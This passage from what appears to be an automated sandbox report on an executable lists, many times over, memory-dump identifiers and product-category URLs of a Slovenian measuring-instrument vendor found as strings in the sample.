6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/temperaturni-merilni-pretvorniki/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/terenska-ohisja-in-prikazovalniki/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kapa
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/kond
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-iztekanja/plav
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/filmski-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/detektorji-vlage/regulato
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/koncna-in-magnetna-stikal
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritev
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/nivojsk
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/regulac
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/varnost
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/zvezna-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/dodatni-pribo
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/inteligentni-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/mollet-nivo-sipkih-materialov/membranski-ve
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 